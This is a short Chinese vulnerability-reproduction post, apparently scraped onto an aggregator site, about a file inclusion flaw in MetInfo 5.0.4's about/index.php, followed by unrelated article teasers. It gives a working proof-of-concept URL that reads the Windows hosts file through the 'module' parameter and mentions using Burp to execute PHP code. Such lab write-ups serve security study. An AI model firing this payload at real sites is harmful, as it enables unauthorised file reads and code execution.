[漏洞复现] MetInfo5.0.4文件包含漏洞

[漏洞复现] MetInfo5.0.4文件包含漏洞

diannao/2025/4/6 8:11:54/文章来源:https://blog.csdn.net/Da1NtY/article/details/140042796

[漏洞复现] MetInfo5.0.4文件包含漏洞

MetInfo5.0.4

在这里插入图片描述

漏洞代码审计

漏洞出现在about/index.php中，因为利用了动态地址，所以存在漏洞。

在这里插入图片描述

漏洞检查语句（！192.168.109.100是我的服务器ip，需要换成自己的）：

http://192.168.109.100/MetInfo5.0.4/about/index.php?module=c:/windows/system32/drivers/etc/hosts&fmodule=7

结果：

在这里插入图片描述

漏洞利用

可以使用burp工具对漏洞进行利用

把GET模式改为POST，执行PHP代码

行利用

把GET模式改为POST，执行PHP代码

在这里插入图片描述

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/diannao/38706.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

华为仓颉语言体验：一个简单的socket服务端实现

华为仓颉语言体验：一个简单的socket服务端实现

前言由于仓颉目前是内测状态， 不能展示仓颉的详细信息，但是华为仓颉官网的公共文档的内容是可以公开的。我相信有不少喜欢编程的朋友都申请了内测，但是一些编程初学者应该和我一样，处于摸索阶段。所以，我这里把我测…

阅读更多...

排序题目：多数元素 II

排序题目：多数元素 II

文章目录题目标题和出处难度题目描述要求示例数据范围进阶前言解法一思路和算法代码复杂度分析解法二思路和算法代码复杂度分析解法三思路和算法代码复杂度分析题目标题和出处标题：多数元素 II 出处：229. 多数元素 II 难度 3 级题目描述 …

阅读更多...

css高度0到高度auto,过渡的设置

css高度0到高度auto,过渡的设置

1.css从高度0到高度auto,过渡设置方法(vue代码) 你可以通过设置transform: scale(0);到 transform: scale(1); 来实现,具体代码你也可以通过设置transform: scaleY(0);到 transform: scaleY(1); 这两种展示的效果不一样,你可以看看你喜欢那种 // css代码// 原来的css类 .s…

阅读更多...

港口危险货物安全管理人员考试题库(含答案)

港口危险货物安全管理人员考试题库(含答案)

一、单选题 1.化学品安全标签内容中警示词有( )种分别进行危害程度的警示。 A、3 B、4 C、5 参考答案:A 2.运输放射性物品，应当使用( )的放射性物品运输包装容器(以下简称运输容器)。 A、专业 B、专用 C、统一 D、定制参考答案:B 3.库区仪表及计算机监控管理系…

阅读更多...

中电金信：金Gien乐道 | 6月热门新闻盘点回顾这一月的焦点事件

中电金信：金Gien乐道 | 6月热门新闻盘点回顾这一月的焦点事件

“以检之力 e企守护”——上海市检一分院与中电金信开展联学联建 6月24日，上海市人民检察院第一分院与中电金信数字科技集团股份有限公司联合开展“以检之力 e企守护”联学联建活动。双方共同参观了全国检察机关证券期货犯罪办案基地和重大职务犯罪案件办理&#xf…

阅读更多...

HTML5与3D打印：探索网页内容的物理化可能

HTML5与3D打印：探索网页内容的物理化可能

随着科技的飞速发展，互联网与物理世界的交汇点日益增多。HTML5作为当前网页开发的主流标准，不仅推动了网页内容的丰富性和互动性，还在与3D打印技术的结合中，展现出了将网页内容物理化的巨大潜力。本文将探讨HTML5与3D打印的结合点…

阅读更多...

C++ 中的数据类型

C++ 中的数据类型

C规定在创建一个变量或者常量时，必须要指定出相应的数据类型，否则无法给变量分配内存. 1 整型作用：整型变量表示的是整数类型的数据 C中能够表示整型的类型有以下几种方式，区别在于所占内存空间不同： 数据类型占用…

阅读更多...

python（6）numpy的使用详细讲解

python（6）numpy的使用详细讲解

在numpy中，最基本的数据结构是数组，因此我们首先需要了解如何创建一个数组。numpy提供了多种数组创建方法，包括从列表或元组创建、从文件中读取数据、使用特定函数创建等。下面是一些常用的创建方法： 一、创建数组 1. 从列表或元…

阅读更多...

【MySQL备份】Percona XtraBackup基础篇

【MySQL备份】Percona XtraBackup基础篇

目录 1.关于Percona XtraBackup 2. Percona XtraBackup有哪些特点？ 3.安装Percona XtraBackup 3.1.环境信息 3.2.安装步骤 4. xtrabackup内部流程图 5.Percona XtraBackup基础语法 5.1.全量备份 5.2.增量备份 5.2.1.基于全量备份的增量备份 5.2.2.基于前…

阅读更多...

[leetcode]max-consecutive-ones 最大连续1的个数

[leetcode]max-consecutive-ones 最大连续1的个数

. - 力扣（LeetCode） class Solution { public:int findMaxConsecutiveOnes(vector<int>& nums) {int maxCount 0, count 0;int n nums.size();for (int i 0; i < n; i) {if (nums[i] 1) {count;maxCount max(maxCount, count);} else…

阅读更多...

安装和微调大模型（基于LLaMA-Factory）

安装和微调大模型（基于LLaMA-Factory）

打开终端（在Unix或macOS上）或命令提示符/Anaconda Prompt（在Windows上）。创建一个名为lora的虚拟环境并指定Python版本为3.9。 conda create --name lora python3.9激活新创建的虚拟环境。 conda activate lora克隆项目。 git …

阅读更多...

详解COB显示屏的技术特点

详解COB显示屏的技术特点

COB（Chip on Board）显示屏作为一种采用倒装COB封装技术的LED显示屏，在显示效果以及使用稳定性跟防护性方面，拥有更大优势，今天跟随COB显示屏厂家中品瑞科技一起来看看，COB显示屏的技术特点： 1、…

阅读更多...

如何在OpenEuler 上快速部署一套Zabbix7.0监控系统

如何在OpenEuler 上快速部署一套Zabbix7.0监控系统

如何在OpenEuler 上快速部署一套Zabbix监控系统一、环境信息用途机器IP操作系统备注zabbix-server172.22.33.180openeuler 22.03 LTS SP37.0 LTS 版本，容器部署zabbix-agent172.16.10.182openeuler 22.03 LTS SP37.0 源码编译部署二、Docker 部署 2.1 二进制…

阅读更多...

【小白入门】关于视频剪辑该自学还是报课?

【小白入门】关于视频剪辑该自学还是报课?

★解密：【赋能计划—剪辑小白入门】 ★ 在这个视频流量为王的时代，人人都想打造属于自己的IP，今年更是有许多企业家也纷纷下场干起来了，网上曾流行这样的一句话：“现在人们的生活方式改变了，所有事情都值得…

阅读更多...

Anti-Canine Heartworm Antibody (Chicken) - HRP Conjugated

Anti-Canine Heartworm Antibody (Chicken) - HRP Conjugated

犬心丝虫（学名Dirofilaria immitis）是一种寄生丝虫，通过蚊子叮咬而传播。感染犬在早期阶段，大多不会出现症状。随着病情发展，将出现咳嗽、呼吸困难等症状，并伴有右心功能衰竭，最终全身衰弱或虚脱…

阅读更多...

检索增强生成RAG系列3--RAG优化之文档处理

检索增强生成RAG系列3--RAG优化之文档处理

在上一章中罗列了对RAG准确度的几个重要关键点，主要包括2方面，这一章就针对其中一方面，来做详细的讲解以及其解决方案。目录 1 文档解析1.1 文档解析工具1.2 实战经验1.3 代码演示 2 文档分块2.1 分块算法2.2 实战经验2.3 代码演示 3 文档e…

阅读更多...

VLAN基础

VLAN基础

一、什么是Vlan VLAN（Virtual Local Area Network）是虚拟局域网的简称，是一种将单一物理局域网（LAN）在逻辑层面上划分为多个独立的广播域的技术。每个VLAN都是一个独立的广播域，其内部主机可以直接通信&am…

阅读更多...

python自动化办公之shutil

python自动化办公之shutil

目录 1复制文件，此时存在2份相同文件 2移动文件，此时仅有1份文件 3删除文件，此时0份文件用到的库：shutil，os 实现的效果：复制文件，移动文件，删除文件代码： 1复制…

阅读更多...

并发请求数量限制

并发请求数量限制

<!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name"viewport" content"widthdevice-width, initial-scale1.0"><title>并发请求数量限制</title> </head> <…

阅读更多...

使用Colly库进行高效的网络爬虫开发

使用Colly库进行高效的网络爬虫开发

引言随着互联网技术的飞速发展，网络数据已成为信息获取的重要来源。网络爬虫作为自动获取网页内容的工具，在数据分析、市场研究、信息聚合等领域发挥着重要作用。本文将介绍如何使用Go语言中的Colly库来开发高效的网络爬虫。什么是Colly库&#xff1…

阅读更多...

最新文章